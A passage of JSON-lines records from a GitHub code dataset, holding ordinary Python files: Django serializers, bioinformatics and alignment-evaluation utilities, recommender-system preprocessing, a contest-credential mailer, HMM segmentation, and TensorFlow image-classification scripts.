fields = '__all__'\n\nclass CartItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = CartItem\n fields = '__all__'\n\nclass CartItemViewSerializer(serializers.ModelSerializer):\n food = FoodViewSerializer(read_only=True)\n class Meta:\n model = CartItem\n fields = '__all__'\n\nclass NotificationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Notification\n fields = '__all__'","repo_name":"Jenil-Savla/Surplus-Food","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36588176858","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 5 21:07:29 2018\r\n\r\n@author: njayj\r\n\"\"\"\r\n#TAATGCCATGGGATGTT\r\ndef debruijn(str, k):\r\n edges = []\r\n nodes = set()\r\n for i in range(len(str)-k+1):\r\n edges.append((str[i:i+k-1], str[i+1:i+k]))\r\n nodes.add(str[i:i+k-1])\r\n nodes.add(str[i+1:i+k])\r\n return nodes, edges\r\n\r\n#nodes, edges = debruijn(\"ACGCGTCG\", 3)\r\n\r\n# =============================================================================\r\n# def visualize_de_bruijn(st, k):\r\n# \"\"\" Visualize a directed multigraph using graphviz \"\"\"\r\n# nodes, edges = debruijn(st, k)\r\n# dot_str = 'digraph \"DeBruijn graph\" {\\n'\r\n# for node in nodes:\r\n# dot_str += ' %s [label=\"%s\"] ;\\n' % (node, node)\r\n# for src, dst in edges:\r\n# dot_str += ' %s -> %s ;\\n' % (src, dst)\r\n# return dot_str + '}\\n'\r\n# =============================================================================\r\n\r\ndef visualize_de_bruijn(st, k):\r\n \"\"\" Visualize a directed multigraph using graphviz \"\"\"\r\n nodes, edges = debruijn(st, k)\r\n dot_str = 'digraph \"DeBruijn graph\" {'\r\n for node in nodes:\r\n dot_str += ' %s [label=\"%s\"] ;' % (node, node)\r\n for src, dst in edges:\r\n dot_str += ' %s -> %s ;' % (src, dst)\r\n return dot_str + '}'","repo_name":"grasshopper314159/BioinformaticsA1","sub_path":"debruijn.py","file_name":"debruijn.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2747533295","text":"from __future__ import division\nfrom operator import itemgetter\n\n\ndef evaluate(options, testalign, goldalign, log_function):\n goldalign = [(tuple(src),tuple(target)) for src,target in goldalign]\n \n results = {}\n paircounts = {}\n for pair in [(len(srclist),len(targetlist)) for srclist,targetlist in goldalign]:\n paircounts[pair] = paircounts.get(pair,0) + 1\n pairs_normalized = {}\n for pair in paircounts:\n pairs_normalized[pair] = (paircounts[pair],paircounts[pair] / float(len(goldalign)))\n \n log_function('\\ngold alignment frequencies\\n')\n for aligntype,(abscount,relcount) in sorted(list(pairs_normalized.items()),key=itemgetter(1),reverse=True):\n log_function(aligntype,end='')\n log_function(' - ',end='')\n log_function(abscount,end='')\n log_function(' ('+str(relcount)+')')\n \n log_function('\\ntotal recall: ',end='')\n log_function(str(len(goldalign)) + ' pairs in gold')\n (tpstrict,fnstrict,tplax,fnlax) = recall((0,0),goldalign,[i[0] for i in testalign],log_function)\n results['recall'] = (tpstrict,fnstrict,tplax,fnlax)\n\n for aligntype in set([i[1] for i in testalign]):\n testalign_bytype = []\n for i in testalign:\n if i[1] == aligntype:\n testalign_bytype.append(i)\n log_function('precision for alignment type ' + str(aligntype) + ' ( ' + str(len(testalign_bytype)) + ' alignment pairs)')\n precision(goldalign,testalign_bytype,log_function)\n\n log_function('\\ntotal precision:',end='')\n log_function(str(len(testalign)) + ' alignment pairs found')\n (tpstrict,fpstrict,tplax,fplax) = precision(goldalign,testalign,log_function)\n results['precision'] = (tpstrict,fpstrict,tplax,fplax)\n\n return results\n\n\ndef precision(goldalign, testalign, log_function):\n tpstrict=0\n tplax=0\n fpstrict=0\n fplax=0\n for (src,target) in [i[0] for i in testalign]:\n if (src,target) == ((),()):\n continue\n if (src,target) in goldalign:\n tpstrict +=1\n tplax += 1\n else:\n srcset, targetset = set(src), set(target)\n for srclist,targetlist in goldalign:\n #lax condition: hypothesis and gold alignment only need to overlap\n if srcset.intersection(set(srclist)) and targetset.intersection(set(targetlist)):\n fpstrict +=1\n tplax += 1\n break\n else:\n fpstrict +=1\n fplax +=1\n log_function('false positive: ',2)\n log_function((src,target),2)\n if tpstrict+fpstrict > 0:\n log_function('precision strict: ',end='')\n log_function((tpstrict/float(tpstrict+fpstrict)))\n log_function('precision lax: ',end='')\n log_function((tplax/float(tplax+fplax)))\n log_function('')\n else:\n log_function('nothing to find')\n\n return tpstrict,fpstrict,tplax,fplax\n\n\ndef recall(aligntype, goldalign, testalign, log_function):\n\n srclen,targetlen = aligntype\n\n if srclen == 0 and targetlen == 0:\n gapdists = [(0,0) for i in goldalign]\n elif srclen == 0 or targetlen == 0:\n log_function('nothing to find')\n return\n else:\n gapdists = [(len(srclist),len(targetlist)) for srclist,targetlist in goldalign]\n\n tpstrict=0\n tplax=0\n fnstrict=0\n fnlax=0\n for i,pair in enumerate(gapdists):\n if aligntype == pair:\n (srclist,targetlist) = goldalign[i]\n if not srclist or not targetlist:\n continue\n elif (srclist,targetlist) in testalign:\n tpstrict +=1\n tplax +=1\n else:\n srcset, targetset = set(srclist), set(targetlist)\n for src,target in testalign:\n #lax condition: hypothesis and gold alignment only need to overlap\n if srcset.intersection(set(src)) and targetset.intersection(set(target)):\n tplax +=1\n fnstrict+=1\n break\n else:\n fnstrict+=1\n fnlax+=1\n log_function('not found: ',2),\n log_function(goldalign[i],2)\n\n if tpstrict+fnstrict>0:\n log_function('recall strict: '),\n log_function((tpstrict/float(tpstrict+fnstrict)))\n log_function('recall lax: '),\n log_function((tplax/float(tplax+fnlax)))\n log_function('')\n else:\n log_function('nothing to find')\n\n return tpstrict,fnstrict,tplax,fnlax\n\n\ndef finalevaluation(results, log_function):\n recall_value = [0,0,0,0]\n precision_value = [0,0,0,0]\n for i,k in list(results.items()):\n for m,j in enumerate(recall_value):\n recall_value[m] = j+ k['recall'][m]\n for m,j in enumerate(precision_value):\n precision_value[m] = j+ k['precision'][m]\n\n try:\n pstrict = (precision_value[0]/float(precision_value[0]+precision_value[1]))\n except ZeroDivisionError:\n pstrict = 0\n try:\n plax =(precision_value[2]/float(precision_value[2]+precision_value[3]))\n except ZeroDivisionError:\n plax = 0\n try:\n rstrict= (recall_value[0]/float(recall_value[0]+recall_value[1]))\n except ZeroDivisionError:\n rstrict = 0\n try:\n rlax=(recall_value[2]/float(recall_value[2]+recall_value[3]))\n except ZeroDivisionError:\n rlax = 0\n if (pstrict+rstrict) == 0:\n fstrict = 0\n else:\n fstrict=2*(pstrict*rstrict)/(pstrict+rstrict)\n if (plax+rlax) == 0:\n flax=0\n else:\n flax=2*(plax*rlax)/(plax+rlax)\n\n log_function('\\n=========================\\n')\n log_function('total results:')\n log_function('recall strict: ',end='')\n log_function(rstrict)\n log_function('recall lax: ',end='')\n log_function(rlax)\n log_function('')\n\n log_function('precision strict: ',end='')\n log_function(pstrict)\n log_function('precision lax: '),\n log_function(plax)\n log_function('')\n \n log_function('f1 strict: ',end='')\n log_function(fstrict)\n log_function('f1 lax: ',end='')\n log_function(flax)\n log_function('')\n","repo_name":"rsennrich/Bleualign","sub_path":"bleualign/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","stars":277,"dataset":"github-code","pt":"81"} +{"seq_id":"19861611711","text":"# import libraries\r\nimport pandas as pd\r\n\r\n# function to import data\r\ndef import_data(path_books:str,\r\n path_ratings:str,\r\n path_book_tags:str,\r\n path_tags:str\r\n ):\r\n \r\n '''\r\n Function to import data.\r\n \r\n Takes as input the path where the CSVs are located.\r\n \r\n Returns 4 dataframes.\r\n \r\n '''\r\n \r\n #load books dataset\r\n books = pd.read_csv(path_books)\r\n \r\n #load ratings dataset\r\n ratings = pd.read_csv(path_ratings)\r\n \r\n #load book tags dataset\r\n book_tags = pd.read_csv(path_book_tags)\r\n \r\n #load tags dataset\r\n tags = pd.read_csv(path_tags)\r\n \r\n return books, ratings, book_tags, tags\r\n\r\n\r\n# function to preprocess data\r\ndef preprocess_data(ratings:pd.DataFrame,\r\n books:pd.DataFrame,\r\n book_tags:pd.DataFrame,\r\n tags:pd.DataFrame\r\n ):\r\n \r\n '''\r\n Function to pre process data.\r\n \r\n Takes as input the 4 dataframes.\r\n \r\n Return 1 finalized dataframe, with all desired info merged, \r\n the cosine similarities regarding tags and a dict with title indexes.\r\n \r\n '''\r\n \r\n ###############################\r\n # ratings & books #\r\n ###############################\r\n \r\n # drop duplicates from ratings table\r\n ratings.drop_duplicates([\"user_id\",\"book_id\"], inplace = True)\r\n \r\n # drop duplicates from books table\r\n books.drop_duplicates([\"original_title\"], inplace = True) \r\n \r\n # drop unwanted columns\r\n books = books.drop(['best_book_id', 'work_id', 'books_count', 'isbn', 'isbn13', 'language_code', 'work_ratings_count', 'work_text_reviews_count', 'image_url', 'small_image_url'], axis=1, errors='ignore')\r\n \r\n # drop duplicates from books table\r\n books.drop_duplicates('title', inplace=True)\r\n \r\n # find rows with NaN values and drop them from both tables\r\n books_with_nan = books.isnull().any(axis=1)\r\n \r\n for index, row in books[books_with_nan].iterrows():\r\n ratings = ratings[ratings.book_id != row.book_id]\r\n \r\n # drop NAs based on title\r\n books.dropna(subset=['original_title'], inplace=True)\r\n \r\n # compute percentages of positive ratings, negative ratings, average ratings\r\n books['ratings_count_new'] = books.ratings_1 + books.ratings_2 + books.ratings_3\\\r\n + books.ratings_4 + books.ratings_5\r\n \r\n books['per_positive_ratings'] = round((books.ratings_4 + books.ratings_5)/ books.ratings_count_new,3)*100\r\n books['per_negative_ratings'] = round((books.ratings_1 + books.ratings_2)/ books.ratings_count_new,3)*100\r\n books['per_average_ratings'] = round((books.ratings_3)/ books.ratings_count_new,3)*100\r\n \r\n ###############################\r\n # book_tags & tags #\r\n ###############################\r\n \r\n tags_merged = pd.merge(book_tags, \r\n tags, \r\n how='left',\r\n left_on='tag_id',\r\n right_on='tag_id')\r\n\r\n # group the data by name and aggregate the tagValue values\r\n grouped_tags = tags_merged.groupby('goodreads_book_id').agg({'count':'sum','tag_name': lambda x: ', '.join(x)})\r\n\r\n # reset the index to make name a column again\r\n grouped_tags = grouped_tags.reset_index()\r\n\r\n\r\n #rename column\r\n grouped_tags = grouped_tags.rename(columns={'goodreads_book_id':'id','count':'total_number_of_tags'})\r\n \r\n # merge books and tags\r\n books_tags_merged = pd.merge(books, \r\n grouped_tags, \r\n how='inner',\r\n left_on='id',\r\n right_on='id')\r\n \r\n ###############################\r\n # final format of data #\r\n ###############################\r\n \r\n # drop unwanted columns\r\n df = books_tags_merged.drop(['book_id','title','ratings_count','ratings_1','ratings_2','ratings_3','ratings_4','ratings_5'], \\\r\n axis=1, errors='ignore')\r\n \r\n # set title as index\r\n df = df.set_index('id')\r\n\r\n return df\r\n \r\n\r\n\r\n","repo_name":"michaliskarampasis/msc_data_science_aueb","sub_path":"q5_recommender_systems/2_content_based_rec_sys/functions/import_and_preprocess_initial_data.py","file_name":"import_and_preprocess_initial_data.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4083400658","text":"#!/bin/env python\nimport argparse\n\ndef convert(MACaddress):\n if MACaddress.rfind(':') > 0:\n lconvert = lambda mac: '.'.join(MACaddress.replace(':', '')[i:i+4] for i in range(0, 12, 4))\n return lconvert(MACaddress)\n elif MACaddress.rfind('-') > 0:\n lconvert = lambda mac: '.'.join(MACaddress.replace('-', '')[i:i+4] for i in range(0, 12, 4))\n return lconvert(MACaddress)\n elif MACaddress.rfind('.') > 0:\n lconvert = lambda mac: ':'.join(MACaddress.replace('.', '')[i:i+2] for i in range(0, 12, 2))\n return lconvert(MACaddress)\n else:\n return MACaddress\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"MACaddr\",\n help=\"MAC address to convert\")\n args = parser.parse_args()\n if args.MACaddr is not None:\n print(convert(args.MACaddr))\n else:\n print(\"No MAC address provided\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"micedwards/NetworkSnippets","sub_path":"remac.py","file_name":"remac.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71079410186","text":"from email.message import EmailMessage\nimport time\nimport smtplib\n\nfrom db import *\nfrom my_mail import *\nfrom urls import *\n\n\ndef gen_msg(member):\n res = \"\"\n res += \"Здравствуйте, %s!\\n\" % member.nickname\n res += \"\\n\"\n res += \"Ваши данные от тестирующей системы:\\n\"\n res += \"Логин: %s\\n\" % member.login\n res += \"Пароль: %s\\n\" % member.password\n res += \"Ссылка на тестирующую систему: \" + URL_CF_JUNIOR + \"\\n\"\n res += \"Чат в Telegram: \" + URL_TG_JUNIOR + \"\\n\"\n res += \"\\n\"\n res += \"С уважением, Максим Инютин\\n\"\n return res\n\n\ndef send_mail(smtp_server, member, verbose=True):\n msg = EmailMessage()\n msg.set_content(gen_msg(member))\n msg[\"Subject\"] = \"Доступ на Codeforces\"\n msg[\"From\"] = my_email\n # msg[\"To\"] = \", \".join(emails.split(\";\"))\n msg[\"To\"] = member.email\n smtp_server.send_message(msg)\n if verbose:\n print(\"Отправлено письмо\", member.nickname, member.email)\n time.sleep(5)\n\n\ndef send_cf_teams(smtp_server, verbose=True):\n pg = make_session()\n cursor = pg.execute('SELECT * FROM \"Teams\"').all()\n for team in cursor:\n print(team.teamname)\n\n\ndef send_cf_junior(smtp_server, verbose=True):\n pg = make_session()\n cursor = pg.execute('SELECT * FROM \"Members\"').all()\n for member in cursor:\n if member.mail_sent or member.login is None:\n continue\n send_mail(smtp_server, member, verbose=verbose)\n db_member = pg.get(Member, member.id)\n db_member.mail_sent = True\n pg.commit()\n\n\ndef send_cf(mode=\"teams\", verbose=True):\n smtp_server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n smtp_server.starttls()\n smtp_server.login(my_email, my_pass)\n if mode == \"teams\":\n send_cf_teams(smtp_server, verbose=verbose)\n elif mode == \"junior\":\n send_cf_junior(smtp_server, verbose=verbose)\n smtp_server.quit()\n","repo_name":"EngineerXL/ol-parser","sub_path":"mailing.py","file_name":"mailing.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8950248188","text":"'''\n'''\n\nimport numpy as np\nfrom hmmlearn import hmm\n\n# hmm parameters\nMIN_COMP = 2\nMAX_COMP = 4\nNUM_REPS = 25\n\n# smoothing - num. lines\nmax_short_len = 12\n\n# muliplier on median time since to call breaks\nmedian_fold_break = 8\n\nMAX_SEGMENTS = 15\n\n'''\n HMM segmentation\n'''\ndef transform_multinomial(data):\n # converts data into int indices\n unique_bs = set(data.ravel())\n b_to_i = {b: i for i, b in enumerate(unique_bs)}\n train_data = [b_to_i[b] for b in data]\n train_data = np.array(train_data).reshape(-1, 1)\n return train_data\n\n\ndef segment_multinomial_hmm(train_data):\n train_data = transform_multinomial(train_data)\n num_symbols = len(set(train_data.ravel()))\n\n best_zs = []\n best_aic = np.inf\n for nc in range(MIN_COMP, MAX_COMP):\n for rep in range(NUM_REPS):\n model = hmm.MultinomialHMM(n_components=nc)\n model.fit(train_data)\n\n zs = model.predict(train_data)\n log_prob = model.score(train_data)\n\n num_params = (nc-1) + nc*(nc-1) + (num_symbols-1)*nc\n aic = 2*num_params - 2*log_prob\n\n if aic < best_aic:\n best_aic = aic\n best_zs = zs\n\n return best_zs\n\n\n'''\n Post-processing\n'''\ndef smooth(segs):\n # replace first segment with second segment if too short\n bounds = seg_list_to_list_of_bounds(list(range(len(segs)+1)), segs)\n seg1_len = bounds[0][1] - bounds[0][0]\n if seg1_len <= max_short_len:\n seg2_id = segs[bounds[1][0]]\n segs = [seg2_id]*seg1_len + list(segs[seg1_len:])\n segs = np.array(segs)\n\n # replace last segment with second to last segment if too short\n last_len = bounds[-1][1] - bounds[-1][0]\n if last_len <= max_short_len:\n segl2_id = segs[bounds[-2][0]]\n segs = list(segs[:-last_len]) + [segl2_id]*last_len\n segs = np.array(segs)\n\n # simple for now, detect isolated short runs and replace them with earlier seg\n num_replaced = 0\n for short_len in range(max_short_len, -1, -1):\n window = short_len + 2\n for i in range(len(segs) - window):\n [first, *mid, last] = segs[i : i + window]\n if len(set(mid)) == 1:\n mid_item = mid[0]\n if mid_item != first and mid_item != last:\n # replace\n for k in range(i+1, i+window-1):\n segs[k] = first\n num_replaced += 1\n print(f'Replaced {num_replaced} items by smoothing')\n return segs\n\n\ndef combine_bounds(bounds, max_indiv_len = 16):\n # max_indiv_len: if greater than this, do not combine\n new_bounds = []\n comb_to_indiv = {}\n i = 0\n bound_len = lambda b: b[1] - b[0]\n\n while i < len(bounds):\n if bound_len(bounds[i]) <= max_indiv_len:\n j = i + 1\n while j < len(bounds) and bound_len(bounds[j]) <= max_indiv_len:\n j += 1\n cbound = (bounds[i][0], bounds[j-1][1])\n comb_to_indiv[len(new_bounds)] = list(range(i, j))\n new_bounds.append(cbound)\n i = j\n else:\n comb_to_indiv[len(new_bounds)] = [i]\n new_bounds.append(bounds[i])\n i += 1\n\n return new_bounds, comb_to_indiv\n\n\ndef split_breaks(segs, time_sinces, dp_idxs):\n # Split segments by breaks (large time gaps)\n bounds = seg_list_to_list_of_bounds(dp_idxs, segs)\n\n bs = []\n for bound in bounds:\n ts = time_sinces[bound[0] : bound[1]]\n break_threshold = np.median(ts) * median_fold_break\n break_idxs = [i for i, t in enumerate(ts) if t > break_threshold]\n new_bounds = [bound[0]] + [bound[0] + bi for bi in break_idxs] + [bound[1]]\n\n for i in range(1, len(new_bounds)):\n bs.append((new_bounds[i-1], new_bounds[i]))\n \n return list_of_bounds_to_seg_list(bs)\n\n\n'''\n Data structure\n'''\ndef seg_list_to_list_of_bounds(idxs, segs):\n # List of N ints -> List of segments by boundary changes\n i = 0\n bounds = []\n while i < len(segs):\n j = i + 1\n while j < len(segs) and segs[j] == segs[i]:\n j += 1\n bounds.append((idxs[i], idxs[j]))\n i = j\n return bounds\n\n\ndef list_of_bounds_to_seg_list(bs):\n # List of segments by boundary changes -> list of N ints\n res = []\n for i, b in enumerate(bs):\n res += [i] * (b[1] - b[0])\n return res\n\n\n'''\n Primary\n'''\ndef segment(df, num_segments=MAX_SEGMENTS):\n '''\n Segments df by time since downpress\n Returns a list of sub dataframes\n '''\n dp_df = df[df['Has downpress']]\n data = dp_df['Time since downpress']\n data = np.array([round(bs, 2) for bs in data])\n dp_idxs = list(dp_df.index) + [len(df)]\n \n segs = segment_multinomial_hmm(data)\n segs = split_breaks(segs, data, list(range(len(data)+1)))\n smooth_segs = smooth(segs)\n\n # bounds are used for summary plotting\n bounds = seg_list_to_list_of_bounds(dp_idxs, smooth_segs)\n # print(bounds)\n print(f'Found {len(bounds)} groups')\n\n # groups (less than 10) are used for chart detail plotting\n groups = bounds\n num_segs = len(groups)\n if num_segs > num_segments:\n max_indiv_len = 4\n while num_segs > num_segments:\n cbs, comb_to_indiv = combine_bounds(bounds, max_indiv_len)\n num_segs = len(cbs)\n max_indiv_len += 1\n groups = cbs\n print(f'Combined into {len(groups)} groups with max. indiv. len {max_indiv_len}')\n else:\n groups = bounds\n comb_to_indiv = {i: [i] for i in range(len(groups))}\n\n all_dfs = []\n for bound in bounds:\n dfs = df.iloc[bound[0]:bound[1]]\n all_dfs.append(dfs)\n \n return all_dfs, groups, comb_to_indiv\n","repo_name":"maxwshen/piu-analysis","sub_path":"src/hmm_segment.py","file_name":"hmm_segment.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"81"} +{"seq_id":"4911958231","text":"import sys\nimport threading\n\n\nclass Node:\n def __init__(self, idx=None):\n self.idx = idx\n self.parent = None\n\n def __repr__(self):\n return f\"{type(self).__name__}(index={self.idx}, parent={self.parent})\"\n\n\nclass Node2:\n \"\"\"Each node knows about its children, not its parent.\"\"\"\n def __init__(self, idx=None):\n self.idx = idx\n self.children = set()\n\n def __repr__(self):\n return f\"{type(self).__name__}(index={self.idx}, children={self.children!r})\"\n\n\ndef compute_height(n, parents):\n # Replace this code with a faster implementation\n max_height = 0\n for vertex in range(n):\n height = 0\n current = vertex\n while current != -1:\n height += 1\n current = parents[current]\n max_height = max(max_height, height)\n return max_height\n\n\ndef find_max_height(node: Node):\n count = 1\n while node.parent is not None:\n node = node.parent\n count += 1\n return count\n\n\ndef max_height(nodes):\n heights = []\n for i in range(len(nodes)):\n heights.append(find_max_height(nodes[i]))\n return max(heights)\n\n\ndef first_approach(n, parents):\n \"\"\"\n Recursive approach which calculate height for each node\n and then return the maximum one.\n \"\"\"\n # initialize list of nodes\n nodes = [Node(i) for i in range(n)]\n\n # connect each node to its parent\n for idx, parent_id in enumerate(parents):\n if parent_id == -1:\n nodes[idx].parent = None\n else:\n nodes[idx].parent = nodes[parent_id]\n\n print(max_height(nodes))\n\n\ndef second_approach(n, parents):\n \"\"\"\n In this implementation I went for calculating depth\n from the head node, recursively.\n \"\"\"\n # initialize list of nodes\n nodes = [Node2(i) for i in range(n)]\n\n # connect each node to its parent\n for idx, parent_id in enumerate(parents):\n if parent_id == -1:\n head = nodes[idx]\n else:\n nodes[parent_id].children.add(nodes[idx])\n\n print(compute_depth(head))\n\n\ndef compute_depth(node: Node2):\n if not node.children:\n return 1\n return 1 + max(compute_depth(ch) for ch in node.children)\n\n\ndef main():\n n = int(input())\n parents = list(map(int, input().split()))\n # print(compute_height(n, parents))\n # first_approach(n, parents)\n second_approach(n, parents)\n\n\nif __name__ == \"__main__\":\n # In Python, the default limit on recursion depth is rather low,\n # so raise it here for this problem. Note that to take advantage\n # of bigger stack, we have to launch the computation in a new thread.\n sys.setrecursionlimit(10 ** 7) # max depth of recursion\n threading.stack_size(2 ** 27) # new thread will get stack of such size\n threading.Thread(target=main).start()\n","repo_name":"GreatBahram/dsa","sub_path":"data-structures/week01/assignments/tree_height.py","file_name":"tree_height.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72225866184","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\n# Phân loại cơ bản: Dự đoán ảnh quần áo giày dép\n# Hướng dẫn này dùng tf.keras, một API cấp cao để xây dựng và huấn luyện các mô hình trong TensorFlow.\n\n\n# %%\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import models\n\nfrom tensorflow.keras import Sequential\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(tf.__version__)\n\n\n# %%\n# Tập dữ liệu sau khi được tải sẽ trả về 4 mảng NumPy:\n# 2 mảng train_images và train_labels là tập huấn luyện. Mô hình sẽ học từ dữ liệu của 2 mảng này.\n# 2 mảng test_images vả test_labels là tập kiểm thử. Sau khi mô hình được huấn luyện xong, chúng ta sẽ chạy thử mô hình với dữ liệu đầu vào từ test_images để lấy kết quả, và so sánh kết quả đó với dữ liệu đối ứng từ test_labels để đánh giá chất lượng của mạng neuron.\n# Mỗi ảnh là một mảng NumPy 2 chiều, 28x28, với mỗi pixel có giá trị từ 0 đến 255. Nhãn là một mảng của các số nguyên từ 0 đến 9, tương ứng với mỗi lớp quần áo giày dép:\n\n\n# %%\n# import tập dữ liệu về quần áo và giày dép từ Fashion MNIST\n\nfashion_mnist = keras.datasets.fashion_mnist\n\n( train_images , train_labels) , (test_images, test_labels) = fashion_mnist.load_data()\n\nnp.savetxt('train_labels.log' , train_labels , fmt='%s' )\n\nnp.savetxt('train_images.log' , train_images[1] , fmt='%s' )\n\n\n# %%\n# function save the array or img to text\nNUB = 2\nDATA_TEXT = 'data_text'\n\n# print ( train_images[NUB] )\nnp.savetxt( DATA_TEXT + '/text.csv' , train_images[NUB] , fmt='%s' )\n\n# # function save array to img via plt \ndef FUNCTION_SAVE():\n for numb in range(len(train_images)):\n str_a = 'data/'\n str_b = '.png'\n str_a = str_a + str(numb) + str_b\n plt.imsave(str_a , train_images[numb] )\n\n\n# %%\n# khám phá dữ liệu \nprint (\"train_images.shape : \",train_images.shape )\nprint(\"train_image:\" , train_images.size)\nprint (\"train_images[1].size : \",train_images[1].size)\nprint(\"leng : \", len(train_images))\n\n\n# %%\nclass_names = [\n 'Áo thun', \n 'Quần dài', \n 'Áo liền quần', \n 'Đầm', \n 'Áo khoác', \n 'Sandal', \n 'Áo sơ mi', \n 'Giày', \n 'Túi xách', \n 'Ủng']\n\n\n# %%\nfor x in class_names:\n \n print(\" class : \", x)\n\n\n# %%\n# Tiền xử lý dữ liệu\n# Dữ liệu cần được tiền xử lý trước khi được dùng để huấn luyện mạng neuron. Phân tích ảnh đầu tiên trong tập dữ liệu, chúng ta sẽ thấy các pixel có giá trị từ 0 đến 255:\n\n\n# %%\ndef fun_show(x):\n plt.figure()\n plt.imshow(train_images[x])\n plt.colorbar()\n plt.show()\n\nfor x in range(3) :\n fun_show(x)\n\n\n# %%\n# Chúng ta cần tiền xử lý để mỗi một điểm ảnh có giá trị từ 0 đến 1 (có thể hiểu là 0% đến 100%). Để làm điều này, chúng ta chỉ cần lấy giá trị của pixel chia cho 255. Cần lưu ý rằng việc tiền xử lý này phải được áp dụng đồng thời cho cả tập huấn luyện và tập kiểm thử:\n\n\n# %%\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\nplt.imsave(\"train_img.png\", train_images[0] , cmap = plt.cm.binary )\n\n# print (train_images)\n\n\n# %%\nplt.figure(figsize=(10,10))\nfor i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\n plt.imsave(\"train_img.png\", train_images[i] , cmap = plt.cm.binary )\n \nplt.show()\n\n\n# %%\n# Xây dựng mô hình\n# Để xây dựng mạng neuron, chúng tay cần cấu hình các layer của mô hình, và sau đó biên dịch mô hình.\n\n# Thiết lập các layers\n# Thành phần cơ bản của một mạng neuron là các layer. Các layer trích xuất các điểm đặc biệt từ dữ liệu mà chúng đón nhận. Khi thực hiện tốt, những điểm đặc biệt này mang nhiều ý nghĩa và phục vụ cho toán của chúng ta.\n\n# Đa số các mô hình deep learning đều chứa các layer đơn gian được xâu chuỗi lại với nhau. Đa số các layer, ví dụ tf.keras.layers.Dense, đều có các trọng số sẽ được học trong quá trình huấn luyện.\n\n\n# %%\n# Thiết lập các layers\nmodel = keras.Sequential([\n keras.layers.Flatten( input_shape = (28, 28) ), \n keras.layers.Dense( 128, activation = 'relu'),\n keras.layers.Dense(10, activation='softmax')\n])\n\n# Biên dịch mô hình\nmodel.compile(\n optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n )\n\n# Huấn luyện mô hình\nmodel.fit(train_images, train_labels, epochs=10)\n\n\n# %%\n# Đánh giá mô hình\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\nprint('\\nTest accuracy:', test_acc)\n\n","repo_name":"mana147/Python-project-computer-vision","sub_path":"Code_Tensorflow/Tensorflow_keras_01.py","file_name":"Tensorflow_keras_01.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28610075525","text":"# -*- coding: utf-8 -*-\r\n\r\n#Train function\r\n\r\nimport os\r\nimport cv2\r\nimport timeit\r\nimport time, math\r\nimport Function as f\r\nimport Image_function as IF\r\nimport pandas as pd\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.applications.imagenet_utils import preprocess_input\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.applications import ResNet50, ResNet101\r\nfrom tensorflow.keras import models, layers, optimizers\r\nfrom tensorflow.keras.layers import Dropout, Conv2D, MaxPooling2D, GlobalAveragePooling2D, BatchNormalization\r\nfrom tensorflow.keras.callbacks import Callback \r\nfrom tensorflow.keras.models import load_model\r\n\r\ndef train_model():\r\n conv_base = ResNet50(weights = 'imagenet',\r\n include_top = False, #whether to include the fully-connected layer at the top of the network.\r\n input_shape = (224, 224, 3))\r\n\r\n conv_base.trainable = True\r\n\r\n model = models.Sequential()\r\n model.add(conv_base)\r\n model.add(GlobalAveragePooling2D())\r\n model.add(layers.Dense(256, activation = 'relu'))\r\n model.add(layers.Dense(128, activation = 'relu'))\r\n model.add(layers.Dense(64, activation = 'relu'))\r\n model.add(layers.Dense(1, activation = 'sigmoid'))\r\n \r\n model.compile(loss='binary_crossentropy', \r\n optimizer= optimizers.Adam (lr = 1e-4, name = 'adam'),\r\n metrics = ['acc'])\r\n \r\n return model\r\n\r\ndef sample_train_data(train_df, train_ratio = 0.7):\r\n\r\n # train is now 75% of the entire data set\r\n # the _junk suffix means that we drop that variable completely\r\n x_train, x_val, y_train, y_val = train_test_split(train_df['Filepath'], \r\n train_df['Label'], \r\n test_size = 1 - train_ratio)\r\n\r\n sub_train_df = pd.DataFrame(columns=['Filepath', 'Label'])\r\n sub_train_df['Label'] = y_train\r\n sub_train_df['Filepath'] = x_train\r\n\r\n sub_val_df = pd.DataFrame(columns=['Filepath', 'Label'])\r\n sub_val_df['Label'] = y_val\r\n sub_val_df['Filepath'] = x_val\r\n \r\n return sub_train_df, sub_val_df\r\n\r\ndef prediction_df(test_df, 